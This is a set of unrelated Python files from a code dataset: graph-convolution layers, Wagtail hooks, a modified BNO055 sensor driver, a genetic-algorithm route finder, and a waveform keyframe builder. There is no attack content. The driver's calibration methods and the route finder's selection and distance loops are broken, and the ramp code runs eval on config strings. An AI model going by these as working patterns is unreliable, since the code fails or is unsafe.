r_inv[np.isinf(r_inv)] = 0.
r_mat_inv = sp.diags(r_inv)
mx = r_mat_inv.dot(mx)
return mx
if method == 'sym':
rowsum = np.array(mx.sum(1))
r_inv = np.power(rowsum, -0.5).flatten()
r_inv[np.isinf(r_inv)] = 0.
r_mat_inv = sp.diags(r_inv)
mx = mx.dot(r_mat_inv).transpose().dot(r_mat_inv)
return mx
def spm_to_tensor(sparse_mx):
sparse_mx = sparse_mx.tocoo().astype(np.float32)
indices = torch.from_numpy(np.vstack(
(sparse_mx.row, sparse_mx.col))).long()
values = torch.from_numpy(sparse_mx.data)
shape = torch.Size(sparse_mx.shape)
return torch.sparse.FloatTensor(indices, values, shape)
class GraphConv(nn.Module):
def __init__(self, in_channels, out_channels, dropout=False, relu=True):
super().__init__()
if dropout:
self.dropout = nn.Dropout(p=0.5)
else:
self.dropout = None
self.layer = nn.Linear(in_channels, out_channels)
if relu:
# self.relu = nn.LeakyReLU(negative_slope=0.2)
self.relu = nn.ReLU()
else:
self.relu = None
def forward(self, inputs, adj):
if self.dropout is not None:
inputs = self.dropout(inputs)
outputs = torch.mm(adj, torch.mm(inputs, self.layer.weight.T)) + self.layer.bias
if self.relu is not None:
outputs = self.relu(outputs)
return outputs
class GCN(nn.Module):
def __init__(self, adj, in_channels, out_channels, hidden_layers):
super().__init__()
adj = normt_spm(adj, method='in')
adj = spm_to_tensor(adj)
self.adj = adj.to(device)
self.train_adj = self.adj
hl = hidden_layers.split(',')
if hl[-1] == 'd':
dropout_last = True
hl = hl[:-1]
else:
dropout_last = False
i = 0
layers = []
last_c = in_channels
for c in hl:
if c[0] == 'd':
dropout = True
c = c[1:]
else:
dropout = False
c = int(c)
i += 1
conv = GraphConv(last_c, c, dropout=dropout)
self.add_module('conv{}'.format(i), conv)
layers.append(conv)
last_c = c
conv = GraphConv(last_c, out_channels, relu=False, dropout=dropout_last)
self.add_module('conv-last', conv)
layers.append(conv)
self.layers = layers
def forward(self, x):
if self.training:
for conv in self.layers:
x = conv(x, self.train_adj)
else:
for conv in self.layers:
x = conv(x, self.adj)
return F.normalize(x)
### GCNII
class GraphConvolution(nn.Module):
def __init__(self, in_features, out_features, dropout=False, relu=True, residual=False, variant=False):
super(GraphConvolution, self).__init__()
self.variant = variant
if self.variant:
self.in_features = 2*in_features
else:
self.in_features = in_features
if dropout:
self.dropout = nn.Dropout(p=0.5)
else:
self.dropout = None
if relu:
self.relu = nn.ReLU()
else:
self.relu = None
self.out_features = out_features
self.residual = residual
self.layer = nn.Linear(self.in_features, self.out_features, bias = False)
def reset_parameters(self):
stdv = 1. / math.sqrt(self.out_features)
self.weight.data.uniform_(-stdv, stdv)
def forward(self, input, adj , h0 , lamda, alpha, l):
if self.dropout is not None:
input = self.dropout(input)
theta = math.log(lamda/l+1)
hi = torch.spmm(adj, input)
if self.variant:
support = torch.cat([hi,h0],1)
r = (1-alpha)*hi+alpha*h0
else:
support = (1-alpha)*hi+alpha*h0
r = support
mm_term = torch.mm(support, self.layer.weight.T)
output = theta*mm_term+(1-theta)*r
if self.residual:
output = output+input
if self.relu is not None:
output = self.relu(output)
return output
class GCNII(nn.Module):
def __init__(self, adj, in_channels , out_channels, hidden_dim, hidden_layers, lamda, alpha, variant, dropout = True):
super(GCNII, self).__init__()
self.alpha = alpha
self.lamda = lamda
adj = normt_spm(adj, method='in')
adj = spm_to_tensor(adj)
self.adj = adj.to(device)
i = 0
layers = nn.ModuleList()
self.fc_dim = nn.Linear(in_channels, hidden_dim)
self.relu = nn.ReLU()
self.dropout = nn.Dropout()
for i, c in enumerate(range(hidden_layers)):
conv = GraphConvolution(hidden_dim, hidden_dim, variant=variant, dropout=dropout)
layers.append(conv)
self.layers = layers
self.fc_out = nn.Linear(hidden_dim, out_channels)
def forward(self, x):
_layers = []
layer_inner = self.relu(self.fc_dim(self.dropout(x)))
# layer_inner = x
_layers.append(layer_inner)
for i,con in enumerate(self.layers):
layer_inner = con(layer_inner,self.adj,_layers[0],self.lamda,self.alpha,i+1)
layer_inner = self.fc_out(self.dropout(layer_inner))
return layer_inner | StarcoderdataPython |
5076701 | from django.contrib.staticfiles.templatetags.staticfiles import static
from django.utils.html import format_html
from wagtail.core import hooks
@hooks.register('insert_editor_js')
def editor_js():
return format_html(
"""
<script src="{}"></script>
""",
static('wagtailrelated/js/admin_widget.js'),
)
@hooks.register('insert_editor_css')
def editor_css():
return format_html(
"""
<link rel="stylesheet" href="{}">
""",
static('wagtailrelated/css/admin_widget.css'),
)
| StarcoderdataPython |
91647 | # The MIT License (MIT)
#
# Copyright (c) 2017 <NAME> for Adafruit Industries.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
``adafruit_bno055`` - Adafruit 9-DOF Absolute Orientation IMU Fusion Breakout - BNO055
=======================================================================================
This is a CircuitPython driver for the Bosch BNO055 nine degree of freedom
inertial measurement unit module with sensor fusion.
* Author(s): <NAME>
"""
import time
import os
CAL_DATA_PATH = os.path.dirname(os.path.abspath(__file__))
CAL_DATA_NAME = "BNO055_CALIBRATION_DATA.txt"
from micropython import const
from adafruit_bus_device.i2c_device import I2CDevice
from adafruit_register.i2c_struct import Struct, UnaryStruct
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_BNO055.git"
_CHIP_ID = const(0xa0)
CONFIG_MODE = const(0x00)
ACCONLY_MODE = const(0x01)
MAGONLY_MODE = const(0x02)
GYRONLY_MODE = const(0x03)
ACCMAG_MODE = const(0x04)
ACCGYRO_MODE = const(0x05)
MAGGYRO_MODE = const(0x06)
AMG_MODE = const(0x07)
IMUPLUS_MODE = const(0x08)
COMPASS_MODE = const(0x09)
M4G_MODE = const(0x0a)
NDOF_FMC_OFF_MODE = const(0x0b)
NDOF_MODE = const(0x0c)
_POWER_NORMAL = const(0x00)
_POWER_LOW = const(0x01)
_POWER_SUSPEND = const(0x02)
_MODE_REGISTER = const(0x3d)
_PAGE_REGISTER = const(0x07)
_CALIBRATION_REGISTER = const(0x35)
_TRIGGER_REGISTER = const(0x3f)
_POWER_REGISTER = const(0x3e)
_ID_REGISTER = const(0x00)
class _ScaledReadOnlyStruct(Struct): # pylint: disable=too-few-public-methods
def __init__(self, register_address, struct_format, scale):
super(_ScaledReadOnlyStruct, self).__init__(
register_address, struct_format)
self.scale = scale
def __get__(self, obj, objtype=None):
result = super(_ScaledReadOnlyStruct, self).__get__(obj, objtype)
return tuple(self.scale * v for v in result)
def __set__(self, obj, value):
raise NotImplementedError()
class _ReadOnlyUnaryStruct(UnaryStruct): # pylint: disable=too-few-public-methods
def __set__(self, obj, value):
raise NotImplementedError()
class BNO055:
"""
Driver for the BNO055 9DOF IMU sensor.
"""
temperature = _ReadOnlyUnaryStruct(0x34, 'b')
"""Measures the temperature of the chip in degrees Celsius."""
accelerometer = _ScaledReadOnlyStruct(0x08, '<hhh', 1/100)
"""Gives the raw accelerometer readings, in m/s.
.. warning:: This is deprecated. Use ``acceleration`` instead. It'll work
with other drivers too."""
acceleration = _ScaledReadOnlyStruct(0x08, '<hhh', 1/100)
"""Gives the raw accelerometer readings, in m/s."""
magnetometer = _ScaledReadOnlyStruct(0x0e, '<hhh', 1/16)
"""Gives the raw magnetometer readings in microteslas.
.. warning:: This is deprecated. Use ``magnetic`` instead. It'll work with
other drivers too."""
magnetic = _ScaledReadOnlyStruct(0x0e, '<hhh', 1/16)
"""Gives the raw magnetometer readings in microteslas."""
gyroscope = _ScaledReadOnlyStruct(0x14, '<hhh', 1/16)
"""Gives the raw gyroscope reading in degrees per second."""
euler = _ScaledReadOnlyStruct(0x1a, '<hhh', 1/16)
"""Gives the calculated orientation angles, in degrees."""
quaternion = _ScaledReadOnlyStruct(0x20, '<hhhh', 1/(1<<14))
"""Gives the calculated orientation as a quaternion."""
linear_acceleration = _ScaledReadOnlyStruct(0x28, '<hhh', 1/100)
"""Returns the linear acceleration, without gravity, in m/s."""
gravity = _ScaledReadOnlyStruct(0x2e, '<hhh', 1/100)
"""Returns the gravity vector, without acceleration in m/s."""
def __init__(self, i2c, address=0x28):
self.i2c_device = I2CDevice(i2c, address)
self.buffer = bytearray(2)
chip_id = self._read_register(_ID_REGISTER)
if chip_id != _CHIP_ID:
raise RuntimeError("bad chip id (%x != %x)" % (chip_id, _CHIP_ID))
self._reset()
self._write_register(_POWER_REGISTER, _POWER_NORMAL)
self._write_register(_PAGE_REGISTER, 0x00)
self._write_register(_TRIGGER_REGISTER, 0x00)
time.sleep(0.01)
self.mode = NDOF_MODE
time.sleep(0.01)
def _write_register(self, register, value):
self.buffer[0] = register
self.buffer[1] = value
with self.i2c_device as i2c:
i2c.write(self.buffer)
def _write_bytes(self, address, data):
with self.i2c_device as i2c:
i2c.writeList(address, data)
def _read_register(self, register):
self.buffer[0] = register
with self.i2c_device as i2c:
i2c.write_then_readinto(self.buffer, self.buffer,
out_end=1, in_start=1)
return self.buffer[1]
def _read_bytes(self, address, length):
if self._i2c_device is not None:
return bytearray(self._i2c_device.readList(address, length))
def _reset(self):
"""Resets the sensor to default settings."""
self.mode = CONFIG_MODE
try:
self._write_register(_TRIGGER_REGISTER, 0x20)
except OSError: # error due to the chip resetting
pass
# wait for the chip to reset (650 ms typ.)
time.sleep(0.7)
@property
def mode(self):
"""
Switch the mode of operation and return the previous mode.
Mode of operation defines which sensors are enabled and whether the
measurements are absolute or relative:
+------------------+-------+---------+------+----------+
| Mode | Accel | Compass | Gyro | Absolute |
+==================+=======+=========+======+==========+
| CONFIG_MODE | - | - | - | - |
+------------------+-------+---------+------+----------+
| ACCONLY_MODE | X | - | - | - |
+------------------+-------+---------+------+----------+
| MAGONLY_MODE | - | X | - | - |
+------------------+-------+---------+------+----------+
| GYRONLY_MODE | - | - | X | - |
+------------------+-------+---------+------+----------+
| ACCMAG_MODE | X | X | - | - |
+------------------+-------+---------+------+----------+
| ACCGYRO_MODE | X | - | X | - |
+------------------+-------+---------+------+----------+
| MAGGYRO_MODE | - | X | X | - |
+------------------+-------+---------+------+----------+
| AMG_MODE | X | X | X | - |
+------------------+-------+---------+------+----------+
| IMUPLUS_MODE | X | - | X | - |
+------------------+-------+---------+------+----------+
| COMPASS_MODE | X | X | - | X |
+------------------+-------+---------+------+----------+
| M4G_MODE | X | X | - | - |
+------------------+-------+---------+------+----------+
| NDOF_FMC_OFF_MODE| X | X | X | X |
+------------------+-------+---------+------+----------+
| NDOF_MODE | X | X | X | X |
+------------------+-------+---------+------+----------+
The default mode is ``NDOF_MODE``.
"""
return self._read_register(_MODE_REGISTER)
@mode.setter
def mode(self, new_mode):
self._write_register(_MODE_REGISTER, CONFIG_MODE) # Empirically necessary
time.sleep(0.02) # Datasheet table 3.6
if new_mode != CONFIG_MODE:
self._write_register(_MODE_REGISTER, new_mode)
time.sleep(0.01) # Table 3.6
@property
def get_calibration(self):
"""Gets the BNO055's calibration data if it exists"""
if not self.calibrated:
raise ValueError('Device not yet calibrated!')
self.mode(CONFIG_MODE)
data = list(self._read_bytes(0x55, 22))
self.mode(NDOF_MODE)
return data
@property
def set_calibration(self, data):
"""Sets the BNO055's calibration data"""
if data is None or len(data) != 22:
raise ValueError('Expected a list of 22 bytes of calibration data!')
self.mode(CONFIG_MODE)
self._write_bytes(0x55, data)
self.mode(NDOF_MODE)
@property
def load_calibration(self, fpath):
"""Loads the BNO055's calibration data from a file"""
data = bytearray(22)
with open(CAL_DATA_PATH+CAL_DATA_NAME, 'r') as f:
if len(f.read().split('\n')) != 22:
raise ValueError('Expected a list of 22 bytes of calibration data!')
for item in f.read().split('\n'):
data[idx] = byte(item, 'utf-8')
f.close()
return data
@property
def save_calibration(self, fpath):
"""Saves the BNO055's calibration data to a file"""
with open(CAL_DATA_PATH+CAL_DATA_NAME, 'wb') as f:
for item in self.get_calibration:
f.write("%s\n" % item)
f.close()
@property
def calibration_status(self):
"""Tuple containing sys, gyro, accel, and mag calibration data."""
calibration_data = self._read_register(_CALIBRATION_REGISTER)
sys = (calibration_data >> 6) & 0x03
gyro = (calibration_data >> 4) & 0x03
accel = (calibration_data >> 2) & 0x03
mag = calibration_data & 0x03
return sys, gyro, accel, mag
@property
def calibrated(self):
"""Boolean indicating calibration status."""
sys, gyro, accel, mag = self.calibration_status
return sys == gyro == accel == mag == 0x03
@property
def external_crystal(self):
"""Switches the use of external crystal on or off."""
last_mode = self.mode
self.mode = CONFIG_MODE
self._write_register(_PAGE_REGISTER, 0x00)
value = self._read_register(_TRIGGER_REGISTER)
self.mode = last_mode
return value == 0x80
@external_crystal.setter
def use_external_crystal(self, value):
last_mode = self.mode
self.mode = CONFIG_MODE
self._write_register(_PAGE_REGISTER, 0x00)
self._write_register(_TRIGGER_REGISTER, 0x80 if value else 0x00)
self.mode = last_mode
time.sleep(0.01)
| StarcoderdataPython |
8049392 | import math
from tkinter import *
import random
from itertools import permutations
from scipy.spatial import distance
root = Tk()
root.title("Найду Вам оптимальный путь")
N = 9
root.geometry(str(N*100) + "x" + str(N*100))
my_canvas = Canvas(root, width=N*100, height=N*100, bg="black")
my_canvas.pack(pady=1)
recordDistance = math.inf
# matrix = [[randrange(N * 100) for i in range(2)] for j in range(N)]
matrix = [[658, 791], [258, 286], [31, 701], [883, 522], [142, 578], [585, 740], [741, 21], [279, 97], [196, 636]]
firstOrder = list(range(0, N))
perm = []
bestPerm = []
print(matrix)
def lexicographical_permutation(arr):
global perm
str_arr = [str(x) for x in arr]
arr_str_perm = sorted(list(integer) for integer in permutations(str_arr))
for y in arr_str_perm:
perm += [list(map(int, y))]
def find_optimal_path():
global recordDistance, bestPerm
# first_time = True
for p in perm:
dist = 0
for idx in p:
if idx + 1 < len(matrix):
a = (matrix[p[idx]][0], matrix[p[idx]][1], 0)
b = (matrix[p[idx + 1]][0], matrix[p[idx + 1]][1], 0)
dist += distance.euclidean(a, b)
# if first_time:
# recordDistance = dist
# bestPerm = p
# first_time = False
if dist < recordDistance:
recordDistance = dist
bestPerm = p
# print(p)
# print(dist)
def create_dot(x, y, idx, offset):
my_canvas.create_oval(x - 2 - offset, y - 2 - offset, x + 2 - offset, y + 2 - offset, fill="red")
my_canvas.create_text(x - 10, y + 10, anchor=W, font="Purisa",
text=idx, fill="yellow")
def draw_path(color, path, offset):
for i, coords in enumerate(matrix):
create_dot(coords[0], coords[1], i, offset)
for idx in range(len(path)):
if idx + 1 < len(path):
my_canvas.create_line(matrix[path[idx]][0] - offset, matrix[path[idx]][1] - offset,
matrix[path[idx + 1]][0] - offset, matrix[path[idx + 1]][1] - offset,
fill=color)
# lexicographical_permutation(firstOrder)
# find_optimal_path()
# bestPerm = [0, 2, 3, 1, 4]
# recordDistance = 678.3042142670913
bestPerm = [3, 0, 5, 8, 2, 4, 1, 7, 6]
recordDistance = 2157.9982622423195
print(bestPerm)
print(recordDistance)
draw_path('white', bestPerm, 0)
GenOrder = list(range(0, N))
popSize = 200
# тут вариации GenOrder
population = []
bestPopulation = []
recordGenDistance = math.inf
fitness = []
def generate_population():
global population
for pop in range(popSize):
random.shuffle(GenOrder)
population += [GenOrder.copy()]
def calculate_fitness():
global fitness, recordGenDistance, bestPopulation
for pop in population:
dist = 0
for val, idx in enumerate(pop):
if idx + 1 < len(matrix):
a = (matrix[pop[idx]][0], matrix[pop[idx]][1], 0)
b = (matrix[pop[idx + 1]][0], matrix[pop[idx + 1]][1], 0)
dist += distance.euclidean(a, b)
fitness += [1/dist]
if dist < recordGenDistance:
bestPopulation = pop
recordGenDistance = dist
def normalize_fitness():
fit_sum = sum(fitness.copy())
for idx in range(len(fitness)):
fitness[idx] = fitness[idx]/fit_sum
def select_population(arr, prop):
index = 0
r = random.randrange(1)
while r > 0:
r = r - prop[index]
index += 1
index -= 1
if index >= len(arr):
return arr[0].copy()
return arr[index].copy()
def mutate(arr):
for _ in range(N):
if random.random() < 0.2:
idx_a = random.randrange(len(arr))
idx_b = (idx_a + 1) % N
temp = arr[idx_a]
arr[idx_a] = arr[idx_b]
arr[idx_b] = temp
return arr
def cross_over(arr_a, arr_b):
start = random.randrange(len(arr_b))
if start + 1 == len(arr_a):
return arr_a
end = random.randrange(start + 1, len(arr_a))
new_order = arr_a[start:end + 1].copy()
for idx in range(len(arr_b)):
if arr_b[idx] not in new_order:
new_order += [arr_b[idx]]
return new_order
def next_generation():
global population
new_pop = []
for _ in range(popSize):
# pop_a = select_population(population, fitness)
# pop_b = select_population(population, fitness)
cross_pop = cross_over(bestPopulation.copy(), bestPopulation.copy())
mutate(cross_pop)
new_pop += [cross_pop]
population = new_pop
generate_population()
calculate_fitness()
normalize_fitness()
for _ in range(10):
next_generation()
calculate_fitness()
normalize_fitness()
print(recordGenDistance)
print(bestPopulation)
print(recordGenDistance)
draw_path('green', bestPopulation, 10)
root.mainloop()
| StarcoderdataPython |
5063639 | <gh_stars>0
"""Provides classes to build arbitrary waveforms."""
import json
import numpy as np
class KeyFrameList(object):
"""Basic timing element.
Holds a list of keyframes. Each keyframe is a position in time relative to
a parent keyframe. If parent keyframe is None, then the time is relative
to the start of the ramp.
All keyframe data is stored in the dictionary self.dct. Each key in the
dictionary is a string which is the name of that KeyFrame.
self.dct has the following structure:
{
"key_name_1": {
"comment": "Info about this keyframe",
"parent": "another_key_name",
"time": 10.0
}
.
.
.
"key_name_n": {...}
}
Additionally, some keyframes can have a "hooks" key, which is also a
dictionary. Refer to server.Hooks for details.
"""
def __init__(self, dct=None):
if dct is None:
return
self.dct = dct
# check all parent keys are actually valid
for key in self.dct:
kf = self.dct[key]
parent_name = kf['parent']
if parent_name is not None:
if parent_name not in self.dct:
error_string = ('KeyFrame "' + key + '" has a parent "' +
parent_name +
'"" which is not a known KeyFrame')
raise KeyError(error_string)
self.is_baked = False
# find absolute times for all the keys
self.bake()
def bake(self):
"""Find absolute times for all keys.
Absolute time is stored in the KeyFrame dictionary as the variable
__abs_time__.
"""
self.unbake()
for key in self.dct:
self.get_absolute_time(key)
self.is_baked = True
def unbake(self):
"""Remove absolute times for all keys."""
for key in self.dct:
# pop __abs_time__ if it exists
self.dct[key].pop('__abs_time__', None)
self.is_baked = False
def get_absolute_time(self, key):
"""Returns the absolute time position of the key.
If absolute time positions are not calculated, then this function
calculates it.
"""
keyframe = self.dct[key]
try:
# if absolute time is already calculated, return that
return keyframe['__abs_time__']
except KeyError:
# if not, calculate by adding relative time to parent's time
if keyframe['parent'] is None:
keyframe['__abs_time__'] = keyframe['time']
else:
parent_time = self.get_absolute_time(keyframe['parent'])
abs_time = keyframe['time'] + parent_time
keyframe['__abs_time__'] = abs_time
return keyframe['__abs_time__']
def sorted_key_list(self):
"""Returns list of keys sorted according to their absolute time."""
if not self.is_baked:
self.bake()
key_value_tuple = sorted(self.dct.items(),
key=lambda x: x[1]['__abs_time__'])
skl = [k[0] for k in key_value_tuple]
return skl
def set_time(self, key_name, new_time):
"""Sets the time of key."""
self.unbake()
kf = self.dct[key_name]
kf['time'] = new_time
self.bake()
def set_comment(self, key_name, new_comment):
"""Sets the comment of key."""
kf = self.dct[key_name]
kf['comment'] = new_comment
def set_parent(self, key_name, new_parent):
"""Sets the parent of the key."""
self.unbake()
kf = self.dct[key_name]
kf['parent'] = new_parent
self.bake()
def set_name(self, old_name, new_name):
if old_name != new_name:
self.unbake()
self.dct[new_name] = self.dct[old_name]
self.dct.pop(old_name)
for key in self.dct:
if self.dct[key]['parent'] == old_name:
self.dct[key]['parent'] = new_name
self.bake()
def add_keyframe(self, new_key_name, new_key_dict):
self.unbake()
self.dct[new_key_name] = new_key_dict
self.bake()
def del_keyframe(self, key_name):
self.unbake()
kf = self.dct[key_name]
parent_key = kf['parent']
# find children of this keyframe
child_keys = [k for k in self.dct if self.dct[k]['parent'] == key_name]
# set the parent of child keys to the parent of the deleted key_name
for ck in child_keys:
self.dct[ck]['parent'] = parent_key
# remove the key_name
self.dct.pop(key_name)
self.bake()
def is_ancestor(self, child_key_name, ancestor_key_name):
"""Returns True if ancestor lies in the ancestry tree of child."""
# all keys are descendents of None
if ancestor_key_name is None:
return True
one_up_parent = self.dct[child_key_name]['parent']
if child_key_name == ancestor_key_name:
# debatable semantics, but a person lies in his/her own
# ancestry tree
return True
elif one_up_parent is None:
return False
else:
return self.is_ancestor(one_up_parent, ancestor_key_name)
def add_hook(self, key_name, hook_name, hook_dict):
"""Add hook to the keyframe key_name."""
kf = self.dct[key_name]
if 'hooks' not in kf:
kf['hooks'] = {}
kf['hooks'][str(hook_name)] = hook_dict
def remove_hook(self, key_name, hook_name):
"""Remove hook from the keyframe key_name."""
kf = self.dct[key_name]
if 'hooks' in kf:
if hook_name in kf['hooks']:
return kf['hooks'].pop(hook_name)
def list_hooks(self, key_name):
"""Return list of all hooks attached to key_name."""
kf = self.dct[key_name]
if 'hooks' not in kf:
return []
else:
return kf['hooks'].iterkeys()
def get_hooks_list(self):
skl = self.sorted_key_list()
hooks_list = []
for key in skl:
kf = self.dct[key]
if 'hooks' in kf:
hooks_dict = kf['hooks']
hooks_list.append((self.get_absolute_time(key),
hooks_dict.iteritems()))
return hooks_list
def do_keyframes_overlap(self):
"""Checks for keyframs timing overlap.
Returns the name of the first keyframs that overlapped."""
skl = self.sorted_key_list()
for i in range(len(skl)-1):
this_time = self.dct[skl[i]]['__abs_time__']
next_time = self.dct[skl[i+1]]['__abs_time__']
if abs(next_time-this_time) < 1e-6:
# key frame times overlap
return skl[i]
# Return None if all passed
return None
class Channel(object):
"""Arbitrary waveform channel.
Holds all information to create an arbitrary waveform channel. Each channel
has the following attributes:
ch_name(str) - name of the channel
key_frame_list(KeyFrameList) - key frames to use for timing information.
dct(dict) - all channel data is here.
dct has the following structure:
{
"comment": "info about the channel.",
"id": "indentifier of the physical hardware channel.",
"type": "analog", # (or "digital")
"keys": {
# set of keyframes for which channel info is provided
"key_name_1":{
"ramp_type": "linear",
"ramp_data": {
"value": 1.0,
...
}
"state": True # only for digital channels
.
.
.
}
}
}
A ramp is defined by its value at certain keyframes and the kind of
interpolation between keyframes. The "keys" dict has all the keys for which
the ramp value is defined. At each keyframe, ramp_data has all the channel
information between that key and the next key.
"""
def __init__(self, ch_name, dct=None, key_frame_list=None):
if dct is None:
return
self.ch_name = ch_name
self.dct = dct
self.key_frame_list = key_frame_list
self.del_unused_keyframes()
# conversion feature was added later. check if conversion field is
# present. If not, added a conversion which is the same as input
if self.dct['type'] == 'analog':
if 'conversion' not in self.dct:
self.dct['conversion'] = 'x'
def set_name(self, new_ch_name):
"""Sets the name of the channel."""
self.ch_name = new_ch_name
def del_unused_keyframes(self):
"""Scans through list of keyframes in the channel and removes those
which are not in self.key_frame_list."""
skl = self.key_frame_list.sorted_key_list()
unused_keys = [k for k in self.dct['keys']
if k not in skl]
for k in unused_keys:
del self.dct['keys'][k]
def change_key_frame_name(self, old_name, new_name):
key_dict = self.dct['keys']
if old_name in key_dict:
key_dict[new_name] = key_dict.pop(old_name)
def get_used_key_frames(self):
"""Returns a list of the keyframes used by this channel, sorted with
time. Each element in the list is a tuple. The first element is the
key_name and the second is the channel data at that keyframe."""
skl = self.key_frame_list.sorted_key_list()
# each element in used_key_frames is a tuple (key_name, key_dict)
used_key_frames = []
for kf in skl:
if kf in self.dct['keys']:
used_key_frames.append((kf, self.dct['keys'][kf]))
return used_key_frames
def get_used_key_frame_list(self):
"""Returns a list of the keyframes used by this channel, sorted with
time."""
skl = self.key_frame_list.sorted_key_list()
# each element in used_key_frames is a tuple (key_name, key_dict)
used_key_frames = []
for kf in skl:
if kf in self.dct['keys']:
used_key_frames.append(kf)
return used_key_frames
def get_ramp_regions(self):
"""Returns a numpy array where each element corresponds to whether to
ramp in that region or jump."""
skl = self.key_frame_list.sorted_key_list()
ramp_or_jump = np.zeros(len(skl) - 1)
used_key_frames = self.get_used_key_frame_list()
for region_number, start_key in enumerate(skl[:-1]):
if start_key in used_key_frames:
key_data = self.dct['keys'][start_key]
ramp_type = key_data['ramp_type']
if ramp_type != "jump":
# this means that a ramp starts in this region. Figure
# out where it ends
curr_key_num = used_key_frames.index(start_key)
end_key_number = curr_key_num + 1
# figure out if the current key was the last key
if end_key_number < len(used_key_frames):
# if it wasnt, then find the end region
end_key_name = used_key_frames[end_key_number]
end_region_index = skl.index(end_key_name)
ramp_or_jump[region_number:end_region_index] = 1
return ramp_or_jump
def get_analog_ramp_data(self, ramp_regions, jump_resolution,
ramp_resolution):
skl = self.key_frame_list.sorted_key_list()
used_key_frame_list = self.get_used_key_frame_list()
all_kf_times = np.array([self.key_frame_list.get_absolute_time(kf)
for kf in skl])
time_array_list = []
n_points = 0
kf_positions = []
for region_number, ramp_or_jump in enumerate(ramp_regions):
kf_positions.append(n_points)
if ramp_or_jump == 0:
time_array_list.append(np.array([all_kf_times[region_number]]))
n_points += 1
else:
start_time = all_kf_times[region_number]
end_time = all_kf_times[region_number + 1]
# find number of time steps
n_time_steps = round((end_time-start_time)/ramp_resolution)
time_array = start_time + np.arange(n_time_steps)*ramp_resolution
# time_array = np.arange(start_time, end_time, ramp_resolution)
time_array_list.append(time_array)
n_points += len(time_array)
time_array_list.append([all_kf_times[-1]])
time_array = np.concatenate(time_array_list)
kf_positions.append(n_points)
n_points += 1
voltages = np.zeros(n_points, dtype=float)
start_voltage = self.dct['keys'][used_key_frame_list[0]]['ramp_data']['value']
end_voltage = self.dct['keys'][used_key_frame_list[-1]]['ramp_data']['value']
start_index = skl.index(used_key_frame_list[0])
end_index = skl.index(used_key_frame_list[-1])
voltages[0:kf_positions[start_index]] = start_voltage
voltages[kf_positions[end_index]:] = end_voltage
for i, ukf in enumerate(used_key_frame_list[:-1]):
start_pos = kf_positions[skl.index(ukf)]
end_pos = kf_positions[skl.index(used_key_frame_list[i+1])]
time_subarray = time_array[start_pos:end_pos]
start_time = time_subarray[0]
end_time = time_array[end_pos]
value_final = self.dct['keys'][used_key_frame_list[i+1]]['ramp_data']['value']
ramp_type = self.dct['keys'][used_key_frame_list[i]]['ramp_type']
ramp_data = self.dct['keys'][used_key_frame_list[i]]['ramp_data']
parms_tuple = (ramp_data, start_time, end_time, value_final,
time_subarray)
ramp_function = analog_ramp_functions[ramp_type]
voltage_sub = ramp_function(*parms_tuple)
voltages[start_pos:end_pos] = voltage_sub
return time_array, self.convert_voltage(voltages, time_array)
def generate_ramp(self, time_div=4e-3):
"""Returns the generated ramp and a time array.
This function assumes a uniform time division throughout.
time_div - time resolution of the ramp.
"""
if self.dct['type'] == 'analog':
is_analog = True
else:
is_analog = False
skl = self.key_frame_list.sorted_key_list()
# each element in used_key_frames is a tuple (key_name, key_dict)
used_key_frames = self.get_used_key_frames()
max_time = self.key_frame_list.get_absolute_time(skl[-1]) + time_div
num_points = int(round(max_time/time_div))
time = np.arange(num_points) * time_div
# time = np.arange(0.0, max_time, time_div)
if is_analog:
voltage = np.zeros(time.shape, dtype=float)
else:
voltage = np.zeros(time.shape, dtype='uint32')
kf_times = np.array([self.key_frame_list.get_absolute_time(ukf[0])
for ukf in used_key_frames])
kf_positions = kf_times/time_div
if is_analog:
# set the start and the end part of the ramp
start_voltage = used_key_frames[0][1]['ramp_data']['value']
end_voltage = used_key_frames[-1][1]['ramp_data']['value']
voltage[0:kf_positions[0]] = start_voltage
voltage[kf_positions[-1]:] = end_voltage
else:
start_voltage = int(used_key_frames[0][1]['state'])
end_voltage = int(used_key_frames[-1][1]['state'])
voltage[0:kf_positions[0]] = start_voltage
voltage[kf_positions[-1]:] = end_voltage
for i in range(len(kf_times)-1):
start_time = kf_times[i]
end_time = kf_times[i+1]
start_index = kf_positions[i]
end_index = kf_positions[i+1]
time_subarray = time[start_index:end_index]
ramp_type = used_key_frames[i][1]['ramp_type']
ramp_data = used_key_frames[i][1]['ramp_data']
if is_analog:
value_final = used_key_frames[i+1][1]['ramp_data']['value']
else:
state = used_key_frames[i][1]['state']
if is_analog:
parms_tuple = (ramp_data, start_time, end_time, value_final,
time_subarray)
else:
parms_tuple = (ramp_data, start_time, end_time, state,
time_subarray)
if is_analog:
ramp_function = analog_ramp_functions[ramp_type]
else:
ramp_function = digital_ramp_functions[ramp_type]
voltage_sub = ramp_function(*parms_tuple)
voltage[start_index:end_index] = voltage_sub
# finally use the conversion and return the voltage
return time, self.convert_voltage(voltage, time)
def convert_voltage(self, voltage, time):
if self.dct['type'] == 'analog':
conversion_str = self.dct['conversion']
return eval(conversion_str, {'x': voltage, 't':time})
else:
return voltage
# Analog Ramp functions
def analog_linear_ramp(ramp_data, start_time, end_time, value_final,
time_subarray):
value_initial = ramp_data["value"]
interp = (time_subarray - start_time)/(end_time - start_time)
return value_initial*(1.0 - interp) + value_final*interp
def analog_linear2_ramp(ramp_data, start_time, end_time, value_final,
time_subarray):
"""Use this when you want a discontinuous jump at the end of the linear ramp."""
value_initial = ramp_data["value"]
value_final2 = ramp_data["value_final"]
